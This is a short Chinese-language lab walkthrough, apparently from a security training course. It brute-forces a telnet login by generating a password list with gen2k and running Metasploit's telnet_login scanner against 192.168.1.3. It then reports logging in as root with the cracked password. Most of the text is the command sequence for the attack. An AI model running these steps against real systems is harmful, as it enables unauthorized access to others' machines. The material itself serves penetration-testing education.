Metasploit批量验证爆破telnet

目的

使用枚举的方法爆破telnet登录密码.

原理

利用gen2k工具,收集来的信息,自动生成密码,使用枚举的方法破解telnet登录密码.

环境

步骤

一、利用gen2k工具生成密码表

1. 下载好Gen2k. 准备好user.txt ,以此生成对应的密码.
2. 在终端中输入命令python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt，生成密码文件passwd.txt，在终端下输入命令more passwd.txt,查看生成的内容.

二、利用Metasploit暴破目标主机telnet服务

1. 在终端中输入命令nmap –sV 192.168.1.3，扫描目标主机，发现目标主机开启telnet服务.
2. 在终端中输入命令msfconsole，启动MSF终端.
3. 在终端中输入命令search telnet，搜索telnet的相关工具和攻击载荷.
4. 在终端中输入命令use auxiliary/scanner/telnet/telnet_login，启用漏洞利用模块, 提示符就会提示进入到该路径下.
5. 在终端中输入命令set RHOSTS 192.168.1.3，设置目标主机的IP地址.
   6.在终端中输入命令set PASS_FILE /home/passwd.txt，爆破时使用的密码文件为passwd.txt.
6. 在终端中输入命令set USER_FILE /home/user.txt，爆破时使用的用户名文件为user.txt.
7. 在终端中输入exploit 192.168.1.3, 对目标主机进行暴力破解.
8. 在终端中显示成功对目标主机的telnet服务进行了破解，账号为root,密码:Simplexue123.
9. 在终端中输入telnet 192.168.1.3,输入获取的账号root和密码Simplexue123,连接成功.
   成功getshell
   进入telent